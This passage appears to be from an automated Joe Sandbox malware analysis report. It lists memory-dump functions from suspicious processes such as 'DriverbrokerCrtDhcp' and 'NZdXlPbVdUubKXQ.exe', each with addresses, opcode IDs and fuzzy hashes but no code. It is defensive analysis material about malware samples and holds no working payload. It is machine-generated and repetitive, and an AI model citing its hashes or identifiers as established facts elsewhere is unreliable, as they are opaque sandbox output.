Opcode ID: 703597a7cddc7df41a494a466d37a7739582855dbdb56b8392b4c0e0e8e5139c
Instruction ID: ce2d4b6b5d1ed071ac878a5c9716a91f9c37ad85bce7d332edca09275ac910f2
Opcode Fuzzy Hash: 703597a7cddc7df41a494a466d37a7739582855dbdb56b8392b4c0e0e8e5139c
Instruction Fuzzy Hash: E701262198D6C21FE32A97B04CB19A63FD4DF8711070E01FAD189CB5E3CC4D5886C391

Function 00007FFD34891588 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16845b040a83f0669127dfe6eccf85388e00daa5f602290bad752e61dd247e3b
Instruction ID: 6052fbad3f55d95a2c5c22cb43b496871d6015be0ca8953977cda05dc10d0543
Opcode Fuzzy Hash: 16845b040a83f0669127dfe6eccf85388e00daa5f602290bad752e61dd247e3b
Instruction Fuzzy Hash: A7115E35B0C6898FEB02EB7888A51D9BFB0EF82315F1945B6C194DB182EA3856598781

Function 00007FFD34894603 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e47b1338d2ae7ec2fa182b51374b2beb99f0dfbda3857e94501ba880257b0b4
Instruction ID: fea490eab609651cdf9611433b43653963509312144f3cb48c36783fed3cda13
Opcode Fuzzy Hash: 6e47b1338d2ae7ec2fa182b51374b2beb99f0dfbda3857e94501ba880257b0b4
Instruction Fuzzy Hash: 88011A11F18D1A5AFAD4F72884E93791AC1EF9B725F144876D60EE32C2DE2C6C41A281

Function 00007FFD34FF5E20 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c470eac8f8c12bd5645bebd4b9f12c48d4f52f755c9bcd8532cc1318e1ee608
Instruction ID: 491a172a0bf661d65b90dfa47a53abaac9fb721dbb5f26f26601e5a58c4b40b5
Opcode Fuzzy Hash: 3c470eac8f8c12bd5645bebd4b9f12c48d4f52f755c9bcd8532cc1318e1ee608
Instruction Fuzzy Hash: C6F0C83170C9084FDBACAE2864562F973D5EF89321B14117FE54EC3652CE3568024245

Function 00007FFD34891590 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2dad47bfc686cb3e7175dabfff67ba7197d6fad9d3b968f237e02207bef699
Instruction ID: 5c7f2a9f7a40eb2cee4ee096caaab1812ef31d5ed8c896d2be828ac87df609c8
Opcode Fuzzy Hash: 5f2dad47bfc686cb3e7175dabfff67ba7197d6fad9d3b968f237e02207bef699
Instruction Fuzzy Hash: 46018E35B0C6898FE702EB7888A11DD7FB0EF42310F1545B6C184CB183DA3856498741

Function 00007FFD34CA7A38 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2323c4fc58ec409d7d825592ce8d2d774475a6cbe3d4345e9ea741ac018394
Instruction ID: 9eef05560079e0bf079428dc6a331e916eb72da663b3833277b07dd45730950d
Opcode Fuzzy Hash: 9b2323c4fc58ec409d7d825592ce8d2d774475a6cbe3d4345e9ea741ac018394
Instruction Fuzzy Hash: F4019335B1F90ADAEBE8DB6484B25BD7261FF46301F501077D61EC25C1DE2DFA10A682

Function 00007FFD34FF03F0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfdcbe9f3e206829674fb8ad086918a90ac9ad94690e3ed3ee49aa37fb80c2f7
Instruction ID: a5fcc76f0bc39e0b5713b9e38d6c7c0d3a1e8ede5e51b1e33cfb84018de2a8ad
Opcode Fuzzy Hash: bfdcbe9f3e206829674fb8ad086918a90ac9ad94690e3ed3ee49aa37fb80c2f7
Instruction Fuzzy Hash: E60128322091468FD71A9B68D8A26E577A0EF03320F1846BEE909CB6C2CA6DA554C791

Function 00007FFD34894C50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362013b5d34738acc780285e36e4ae4212c5fcccef5f2157d53fb0f7eac37152
Instruction ID: 88d34e36ccd910e7c9a613af4694b15b81f9def327dd4448e16916fd34ba08f1
Opcode Fuzzy Hash: 362013b5d34738acc780285e36e4ae4212c5fcccef5f2157d53fb0f7eac37152
Instruction Fuzzy Hash: 63017131A1CD098FDB54EB08C4E4EAE7BA1FF99300F104129C00AE32A0DB38A845DBC1

Function 00007FFD34C57EFF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4499210288fa85df441ce735375f38dccceafb3448e3dc280f0abd037ff5f80b
Instruction ID: fc6d781b28e3908a27344c3e8f6931c8feff730e2eabc6c8388ef7345dcf9978
Opcode Fuzzy Hash: 4499210288fa85df441ce735375f38dccceafb3448e3dc280f0abd037ff5f80b
Instruction Fuzzy Hash: 0FF0BE32F08E2C4FD7A8D68884683ED32E1EB89311F00027BDA0DE3285CE686C465781

Function 00007FFD34891598 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8bd481db6d5591972f59801fcc9b2e3b2a303e7f5574e4216267c05e0dc18fc
Instruction ID: 967bfd557a61ff0b466faf6bd0b5b5d87f5ff1e5e99879c141c93ff42a9ee681
Opcode Fuzzy Hash: f8bd481db6d5591972f59801fcc9b2e3b2a303e7f5574e4216267c05e0dc18fc
Instruction Fuzzy Hash: A2018C30A0D6899FEB02EB7888A419D7FB0AF43314F1841E6C184CB293EA385A499781

Function 00007FFD34FF6842 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847e2acd250c42c5d362564e3d6d1d04fb0f5c6835cad98176dba357adfc8ced
Instruction ID: 0c143bd687280fc07db31e777880ff5eeee83d7b009376b61ad922fc0056093a
Opcode Fuzzy Hash: 847e2acd250c42c5d362564e3d6d1d04fb0f5c6835cad98176dba357adfc8ced
Instruction Fuzzy Hash: 60F0963254D2C59FD3068BB098614D63FB4AF43214B5801FAE149C70B2C92D1646D761

Function 00007FFD34C5DD62 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f4647dc21c0fbad07808d1cd4446439da6f65362a7351ede88587baaffe154
Instruction ID: ac77ff1bb8a0ee16bab4a0297563d058a8eaf6c6654a231d0a5c8c4437b296e3
Opcode Fuzzy Hash: 37f4647dc21c0fbad07808d1cd4446439da6f65362a7351ede88587baaffe154
Instruction Fuzzy Hash: 49F0C23144E3C59FD712DBB088B15ED7FA4EF43200B1840E7D545C60A2C52C564AD761

Function 00007FFD34C57242 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87ef4ce0fc25608a156b9f2474479eb0a4d6248c83802b823d5b44f0d81c9d83
Instruction ID: bd73dad9c1a9371ec72fc57e7984922591088a2b31c78917244820c73c830640
Opcode Fuzzy Hash: 87ef4ce0fc25608a156b9f2474479eb0a4d6248c83802b823d5b44f0d81c9d83
Instruction Fuzzy Hash: 36F0903195E2C69FD3028BB09C659EE3FB4AF43204F1400F6E585CB0A2DA2D664BD761

Function 00007FFD348915A0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20556f1c04098fc7360c0228a5282e9f9ddf5ec4a835f03699871c57df4dcf67
Instruction ID: 83bb0b3519148f23846aad9b1d380005ed85e68ccd0eefb0a1be929b404e9c33
Opcode Fuzzy Hash: 20556f1c04098fc7360c0228a5282e9f9ddf5ec4a835f03699871c57df4dcf67
Instruction Fuzzy Hash: 3B014F30E0D6899FEB02DBB889A41DD7FB0AF47314F1841E6D545DB293E9385A44D781

Function 00007FFD34891E10 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ce5e3b36f8b92d73054b4300b72ff7e089c5c5806085e2c82c48487dc9cc17
Instruction ID: 8ed8776edd5a2fd5b0395d8e4b0808c47b09243f1e6750e6f06107b8191bf94e
Opcode Fuzzy Hash: 58ce5e3b36f8b92d73054b4300b72ff7e089c5c5806085e2c82c48487dc9cc17
Instruction Fuzzy Hash: AAE02625A4C84A07E77CB6B468725B17281EB86214B0511BAD01AC36C2CD1D5C818380

Function 00007FFD34FF3472 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49a988c7ec7c94248d4ebf7f706ed808917dc94afe421db2490de3013c6eda9
Instruction ID: 872709db6080efad60e3dca7f1b71c53798897d949d6a17bb59296eef2980277
Opcode Fuzzy Hash: c49a988c7ec7c94248d4ebf7f706ed808917dc94afe421db2490de3013c6eda9
Instruction Fuzzy Hash: 85E0C932E2C40F8FDB95DBD4D4A15FEB770FF4A340F540239C20EE2181DA292500A654

Function 00007FFD34892782 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d66710d8976b09c8fb163e7f8772538678294ef6a469687554354ea1649e1db
Instruction ID: 112b69e81fa5bc162e045baab2a5e282556715e63bda527b68e2d140aed916c0
Opcode Fuzzy Hash: 4d66710d8976b09c8fb163e7f8772538678294ef6a469687554354ea1649e1db
Instruction Fuzzy Hash: EBE01221E0D81686FB94A794D8A1BA86661EF45310F1041B4DA4ED33C1CD3CAE44D749

Function 00007FFD34C5EA57 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c39c4ae3d8ed7aa12466422c24132735aa450ae74f4277d99848f9feb667b7
Instruction ID: 20bdd2c432efa9fc6e7695324eb4bb21a4fe6da2953b886b444bacc5a79bd42e
Opcode Fuzzy Hash: d2c39c4ae3d8ed7aa12466422c24132735aa450ae74f4277d99848f9feb667b7
Instruction Fuzzy Hash: 00E01282F0D7824BE756073508F11BC2FA1AF1B341B5905F7C65ACA2D3DA5C3909B725

Function 00007FFD34890705 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b414912a7686c33b155c26ab2936b8783952109ef680d42535e2115ecf4cc2
Instruction ID: 6a84f2c8b9e765e391db5c0463a70c77fa1d4daa4fd79fb9a9ffda5b52a31376
Opcode Fuzzy Hash: a0b414912a7686c33b155c26ab2936b8783952109ef680d42535e2115ecf4cc2
Instruction Fuzzy Hash: E0C08C00F0EC0601A42433AD14E60BCA940BFC7220FE00032C30CC40C0AC0F20852182

Function 00007FFD34890768 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d6a0e4d0c48c69e875b61988110369462ee0ba766568c10475daae8059959c
Instruction ID: 93241b530e2f3752f45b1d5a72e20231946c2c53edae25d775303360bdc3e135
Opcode Fuzzy Hash: e1d6a0e4d0c48c69e875b61988110369462ee0ba766568c10475daae8059959c
Instruction Fuzzy Hash: 96C04C305218099FC984F739D9859547BE0FB4A205BD510D0E509C7161E65A98559745

Function 00007FFD34FF03CB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
Instruction ID: 62659749915761772f58657fe4d31495ab6eee76529e8ad7035c8466df901d40
Opcode Fuzzy Hash: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
Instruction Fuzzy Hash: 11D09212B1E6178BF668560142F023E22916F07301E2C023AC39FC19C1CD6CB5417202

Function 00007FFD34FF803B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction ID: b938ffa34366434b1cba19927a6fd083dc7b7a07399069018ae3720a5b42b36b
Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction Fuzzy Hash: 1DD09216B0CA0387F1694A4141F023913909F43B00EA84A3ECB5FC98C18B1D78257221

Function 00007FFD34C5F52B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05c5bb53e9d748e1caaf51cdae38a4dfdc0f414fa437870993a9e9309608a88
Instruction ID: b0462a2304dc469655d61a4902a60c4e11a3e2d187de913db28aa6aa68856456
Opcode Fuzzy Hash: b05c5bb53e9d748e1caaf51cdae38a4dfdc0f414fa437870993a9e9309608a88
Instruction Fuzzy Hash: 54D0CA21B0CA0786F27E8A0380F423E61A18F03341EE080BFC29FC18D6CD1CB942720A

Function 00007FFD34C58A2B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction ID: 275f1463f9094cb814250b3f5b440140c1696458beae6dfcccc5ff2cf93cbd12
Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction Fuzzy Hash: 2DD09220B0E54B85F968461340B023E55A0AF03301E6044BBC29FC18D2CD2C75657221

Function 00007FFD34893A08 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc30a3aef34f05eb9ab3054ed56875d62711f7ec788685c9f91cf3f297b139b
Instruction ID: 3b7229eb1906a206c89c427c4efb9d12619beb0cd0d7d2dc576cf86d2c78e6f2
Opcode Fuzzy Hash: 1dc30a3aef34f05eb9ab3054ed56875d62711f7ec788685c9f91cf3f297b139b
Instruction Fuzzy Hash: F9C04C45F1881A17F255735451352BD08466F84714F645434E40FD72C6CE6C690652C6

Function 00007FFD34FF03DE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14794c1dd9c71b4b61fb2a7fc9270535766c48d62ded38e7f805824f8f65ff39
Instruction ID: 9ee66a9d0973c6c8dae4be9131789f5278ef7f3ed312a1be9d1a0f56adaaf172
Opcode Fuzzy Hash: 14794c1dd9c71b4b61fb2a7fc9270535766c48d62ded38e7f805824f8f65ff39
Instruction Fuzzy Hash: CDC08C20B0D2438FF315531482B133A3760AF03300F2842BAC60ECA4D2CD2CBA41B311

Function 00007FFD34C57F4C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
Instruction ID: ff21f108bced2b03b4263d727cebc68d9eae8252bb4b3f3593d0cfce550cf207
Opcode Fuzzy Hash: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
Instruction Fuzzy Hash: D4C04C40F0E3835BEB61527608F507D5B611F1B305B9906F3D286D51C7E84C6855A365

Function 00007FFD34890728 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9517ad6f383d14280c7ddbd16538a4088edfbfc00dd3f0819667ae87231be9d0
Instruction ID: 3574b61943c4ac72588a7689d2704eb377fc5b7a795855d783841b523c6b1e1e
Opcode Fuzzy Hash: 9517ad6f383d14280c7ddbd16538a4088edfbfc00dd3f0819667ae87231be9d0
Instruction Fuzzy Hash: 6CB00204D5AC0A01A55873B919D647478507BC7115FD51170D50DD41C5EC4E15952252

Function 00007FFD34FF7558 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
Instruction ID: 809c713575c486cbe22e3ba3ff7f781e943426e19e05911bb2f44a56a5e8327e
Opcode Fuzzy Hash: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
Instruction Fuzzy Hash: 2DA00106F1C74397EA2480A50DE403EA2C10F4A645A6C4B75D70BC52C6E89C39407161

Analysis Process: NZdXlPbVdUubKXQ.exePID: 3184, Parent PID: 1064COMMON

Executed Functions

Function 00007FFD348DFA65 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a51eede46f4410cf6c29f2d31de2ebb0d1e72903540b3f19a205714e6846f33
Instruction ID: e82543665e438abb5bc803f58ec59698558cb8c8dedc57546a0af8cdbe4c2a20
Opcode Fuzzy Hash: 0a51eede46f4410cf6c29f2d31de2ebb0d1e72903540b3f19a205714e6846f33
Instruction Fuzzy Hash: 5FC17825A6F69A0BE31D4A284CE24B57791EF93209B2943BDCBDBC3087DD1C6407A6C5

Function 00007FFD348B1A7D Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348b0000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e90e1195804b49d8a52d0fc15c39173cbee980a9068d97233dbdee39e48f884
Instruction ID: 56001776b216e5f8e1fee07b5c7687d354ecda4c6ecc0cd502bb26e7c5d2ca2f
Opcode Fuzzy Hash: 6e90e1195804b49d8a52d0fc15c39173cbee980a9068d97233dbdee39e48f884
Instruction Fuzzy Hash: F591C171A08A898FE795DB98D8B93F9BBE1FF55301F44027ED109D72A2DFB924058780

Function 00007FFD348E1BC9 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD348E1BE6

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 56d1bd4b241726eaa20496d5937634f91f472df660cd7af82250ebe18bdfb6a0
Instruction ID: c5ec0ff1e897eafda451f29e3f5919fa0b5298cae14809cb7e80eebb0bfb4a38
Opcode Fuzzy Hash: 56d1bd4b241726eaa20496d5937634f91f472df660cd7af82250ebe18bdfb6a0
Instruction Fuzzy Hash: 3C119461E0D7894FEB559B7448A50E9BFE0EF97310B4901FBC549CB1A2EE2C9886C701

Function 00007FFD348D5E49 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD348D5E66

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: cee04dd55ac43ea9fa4c2531a144f1b55e4a68ea3680d02dd4e8f43631f373a4
Instruction ID: 66ca4f8a50e83023bc80df1c7e2ef3970818648e855aecb8f13382df1890102b
Opcode Fuzzy Hash: cee04dd55ac43ea9fa4c2531a144f1b55e4a68ea3680d02dd4e8f43631f373a4
Instruction Fuzzy Hash: 76F0657190F3C04FCB16A7344869455BFA1EF6721174A51EEC046CF5A3DA1D8845C711

Function 00007FFD348DF9F9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD348DFA16

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 83fa33732fddb0de3e6f35b6d3b106f1aa29a0488885119809d88636b20edf0a
Instruction ID: 58eedb3a0d00a7e708315af988068092780dabca84251c9caac9f1ae678b9ca6
Opcode Fuzzy Hash: 83fa33732fddb0de3e6f35b6d3b106f1aa29a0488885119809d88636b20edf0a
Instruction Fuzzy Hash: B6E06D6150F7C04FCB1A9B3488658543FA09E2735074A02DAC545CF1B3D61C8889C711

Function 00007FFD348D9889 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD348D98A6

Memory Dump Source

Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4f9ba4395a5fcb0e9efac5ddecee1ce6d2ab1d8da29186cf317393d1e65af22a
Instruction ID: 27e5cd928a072281a5774f33de860580ddfadee4806e92bc8f7c87d45dc0b300
Opcode Fuzzy Hash: 4f9ba4395a5fcb0e9efac5ddecee1ce6d2ab1d8da29186cf317393d1e65af22a
Instruction Fuzzy Hash: 7AE01A7054A3C08FCB0AAB7484A98443FA0EE6721078A41DEC155CF1A3D62EC84AC701

Function 00007FFD348C1842 Relevance: .9, Instructions: 889COMMON

Download Yara Rule

Memory Dump Source

